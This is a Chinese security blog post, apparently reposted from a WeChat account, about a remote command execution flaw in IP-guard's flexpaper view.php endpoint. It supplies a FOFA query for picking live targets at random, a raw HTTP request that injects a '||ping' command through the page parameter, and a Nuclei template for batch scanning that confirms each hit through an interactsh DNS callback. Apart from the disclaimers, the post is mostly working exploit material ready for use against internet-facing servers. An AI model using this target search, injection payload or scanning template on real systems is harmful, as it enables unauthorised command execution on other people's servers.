漏洞描述
在数字化时代,医药企业在信息化进程中不可避免地面临着日益增长的数据资产威胁。为了确保其关键信息资产的安全性、机密性和可用性,医药企业日益倚重于先进的信息安全解决方案。其中,备受瞩目的IP-guard产品在医药领域展现出强大的技术力量,为企业提供了全方位的信息安全保障。IP-guard作为专业的信息安全管理和数据防泄漏解决方案,为企业的关键数据资产提供强有力的保护。其在各行各业都备受欢迎,尤其在医药领域,其价值更是凸显。
漏洞复现
步骤一:在Fofa中搜索以下语法并随机确定要进行攻击测试的目标....
#FOFA搜索语法
"IP-guard" && icon_hash="2030860561"
步骤二:开启代理并打开BP对其首页进行抓包拦截....修改请求头内容....在DNSlog平台可以看到DNSlog记录。
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||ping%20x.x.x.x HTTP/1.1
Host: ip
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: yourCookie
Connection: close
批量脚本
id: ip-guard-webserver-rce
info:
name: IP-Guard Webserver 远程命令执行
author: xingyun
severity: critical
description: |
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
WebServer远程命令执行漏洞。攻击者可利用该漏洞执行任意命令,获取服务器控制权限。
&& icon_hash="2030860561"
reference:
MDPOCS/Ip_Guard_Webserver_View_Rce_Poc.py at 35788...
tags: rce,ipguard
http:
raw:
|
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||ping%20{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
and :
matchers:
type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
"dns"
extractors:
type: kval
kval:
interactsh_ip # Print remote interaction IP in output
揽月安全团队发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!!!!!
扫码获取更多精彩
原文始发于微信公众号(揽月安全团队):IP-guard flexpaper远程命令执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论